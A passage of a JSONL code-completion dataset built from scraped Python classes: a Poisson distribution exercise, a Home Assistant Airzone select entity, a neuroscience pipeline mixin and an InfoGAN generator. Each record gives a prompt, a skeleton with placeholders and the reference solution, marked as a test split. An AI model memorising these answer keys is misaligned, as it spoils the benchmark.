successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n\n def pmf(self, k):\n \"\"\"function that 
calculates the probability mass function for k successes\"\"\"\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n", "source": "the_stack_v2_python_sparse", "source_path": "math/0x03-probability/poisson.py", "source_repo": "dacastanogo/holbertonschool-machine_learning", "split": "test", "star_events_count": 0} {"blob_id": "da1d2eda97be2578ba2f29834122b116e3c305f3", "bodies": ["super().__init__(coordinator, entry, system_zone_id, zone_data)\nself._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\nself._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\nself.entity_description = description\nself.values_dict = {v: k for k, v in description.options_dict.items()}\nself._async_update_attrs()", "param = self.entity_description.api_param\nvalue = self.entity_description.options_dict[option]\nawait self._async_update_hvac_params({param: value})"], "bodies_text": "<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "class_docstring": "Define an Airzone Zone select.", "class_name": "AirzoneZoneSelect", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000027", "length_bytes": 4946, "license_type": "permissive", "methods": [{"docstring": "Initialize.", "name": "__init__", "signature": "def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, 
system_zone_id: str, zone_data: dict[str, Any]) -> None"}, {"docstring": "Change the selected option.", "name": "async_select_option", "signature": "async def async_select_option(self, option: str) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `AirzoneZoneSelect` described below.\n\nClass description:\nDefine an Airzone Zone select.\n\nMethod signatures and docstrings:\n- def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None: Initialize.\n- async def async_select_option(self, option: str) -> None: Change the selected option.", "prompted_full_text": "Implement the Python class `AirzoneZoneSelect` described below.\n\nClass description:\nDefine an Airzone Zone select.\n\nMethod signatures and docstrings:\n- def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None: Initialize.\n- async def async_select_option(self, option: str) -> None: Change the selected option.\n\n<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n<|end_body_0|>\n\n<|body_start_1|>\n param = self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n<|end_body_1|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n <|body_0|>\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AirzoneZoneSelect:\n \"\"\"Define an Airzone Zone select.\"\"\"\n\n def __init__(self, coordinator: AirzoneUpdateCoordinator, description: AirzoneSelectDescription, entry: ConfigEntry, system_zone_id: str, zone_data: dict[str, Any]) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__(coordinator, entry, system_zone_id, zone_data)\n self._attr_name = f'{zone_data[AZD_NAME]} {description.name}'\n self._attr_unique_id = f'{self._attr_unique_id}_{system_zone_id}_{description.key}'\n self.entity_description = description\n self.values_dict = {v: k for k, v in description.options_dict.items()}\n self._async_update_attrs()\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n param = 
self.entity_description.api_param\n value = self.entity_description.options_dict[option]\n await self._async_update_hvac_params({param: value})\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/airzone/select.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "61d45856e9086d995d36a317c86d342465370442", "bodies": ["assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\nactive_identifying_session_ctx = self.sess.get_context()\ndisplay_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\nreturn active_identifying_session_ctx.merging_context('display_', display_subcontext)", "assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\nactive_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\ndisplay_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\nreturn active_identifying_session_ctx.merging_context('display_', display_subcontext)", "from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\nactive_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\nreturn (active_out_figure_paths, final_context)", "def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\nconform_to_implementing_method(cls.build_display_context_for_session)\nconform_to_implementing_method(cls.build_display_context_for_filtered_session)\nconform_to_implementing_method(cls.output_figure)"], "bodies_text": "<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "class_docstring": "provides functionality for saving figures to file. 
from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin", "class_name": "PipelineWithDisplaySavingMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n 
conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000028", "length_bytes": 34127, "license_type": "permissive", "methods": [{"docstring": "builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')", "name": "build_display_context_for_session", "signature": "def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext'"}, {"docstring": "builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')", "name": "build_display_context_for_filtered_session", "signature": "def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext'"}, {"docstring": "outputs the figure using the provided context.", "name": "output_figure", "signature": "def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True)"}, {"docstring": "makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy", "name": "conform", "signature": "def conform(cls, obj)"}], "n_methods": 4, "prompt": "Implement the Python class `PipelineWithDisplaySavingMixin` described below.\n\nClass description:\nprovides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\n\nMethod signatures and docstrings:\n- def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True): outputs the figure using the provided context.\n- def conform(cls, obj): makes the object conform to this mixin by adding its properties. 
Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy", "prompted_full_text": "Implement the Python class `PipelineWithDisplaySavingMixin` described below.\n\nClass description:\nprovides functionality for saving figures to file. from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\n\nMethod signatures and docstrings:\n- def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext': builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\n- def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True): outputs the figure using the provided context.\n- def conform(cls, obj): makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\n\n<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. 
from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n<|end_body_1|>\n\n<|body_start_2|>\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n<|end_body_2|>\n\n<|body_start_3|>\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n<|end_body_3|>\n", "revision_id": "212399d826284b394fce8894ff1a93133aef783f", "skeleton": "<|skeleton|>\nclass PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. 
from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_0|>\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n <|body_1|>\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n <|body_2|>\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PipelineWithDisplaySavingMixin:\n \"\"\"provides functionality for saving figures to file. 
from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplaySavingMixin\"\"\"\n\n def build_display_context_for_session(self, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for the session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.sess.get_context()\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n\n def build_display_context_for_filtered_session(self, filtered_session_name: str, display_fn_name: str, **kwargs) -> 'IdentifyingContext':\n \"\"\"builds a new display context for a filtered session out of kwargs Usage: curr_active_pipeline.build_display_context_for_session(display_fn_name='DecodedEpochSlices', epochs='replays', decoder='long_results_obj')\"\"\"\n assert isinstance(display_fn_name, str), '\"display_fn_name\" must be provided as a string.'\n active_identifying_session_ctx = self.filtered_contexts[filtered_session_name]\n display_subcontext = IdentifyingContext(display_fn_name=display_fn_name, **kwargs)\n return active_identifying_session_ctx.merging_context('display_', display_subcontext)\n\n def output_figure(self, final_context: IdentifyingContext, fig, write_vector_format: bool=False, write_png: bool=True, debug_print=True):\n \"\"\"outputs the figure using the provided context.\"\"\"\n from pyphoplacecellanalysis.General.Mixins.ExportHelpers import build_and_write_to_file\n active_out_figure_paths = build_and_write_to_file(fig, final_context, self.get_output_manager(), write_vector_format=write_vector_format, write_png=write_png, register_output_file_fn=self.register_output_file)\n return (active_out_figure_paths, final_context)\n\n def conform(cls, obj):\n \"\"\"makes the object conform to this mixin by adding its properties. 
Usage: from pyphoplacecellanalysis.General.Pipeline.Stages.Computation import PipelineWithComputedPipelineStageMixin, ComputedPipelineStage from pyphoplacecellanalysis.General.Pipeline.Stages.Display import PipelineWithDisplayPipelineStageMixin, PipelineWithDisplaySavingMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Filtering import FilteredPipelineMixin from pyphoplacecellanalysis.General.Pipeline.Stages.Loading import PipelineWithInputStage, PipelineWithLoadableStage from pyphoplacecellanalysis.General.Pipeline.Stages.BaseNeuropyPipelineStage import PipelineStage from pyphoplacecellanalysis.General.Pipeline.Neuropy\"\"\"\n def conform_to_implementing_method(func):\n \"\"\" captures 'obj', 'cls'\"\"\"\n setattr(type(obj), func.__name__, func)\n conform_to_implementing_method(cls.build_display_context_for_session)\n conform_to_implementing_method(cls.build_display_context_for_filtered_session)\n conform_to_implementing_method(cls.output_figure)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pyphoplacecellanalysis/General/Pipeline/Stages/Display.py", "source_repo": "CommanderPho/pyPhoPlaceCellAnalysis", "split": "test", "star_events_count": 1} {"blob_id": "ee7b959f12a81d2d981a9ebf5c2fdb4cef154f76", "bodies": ["super(InfoGAN_Generator, self).__init__()\nself.n_layer = n_layer\nself.n_conti = n_conti\nself.n_discrete = n_discrete\nself.num_category = num_category\nn_input = noise_dim + n_conti + n_discrete * num_category\nself.featmap_dim = featmap_dim\nself.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\nconvs = []\nBNs = []\nfor layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\nself.convs = nn.ModuleList(convs)\nself.BNs = nn.ModuleList(BNs)", "x = self.fc_in(x)\nx = x.view(-1, self.featmap_dim, 4, 4)\nfor layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\nreturn x"], "bodies_text": "<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer 
== self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "class_docstring": "", "class_name": "InfoGAN_Generator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = 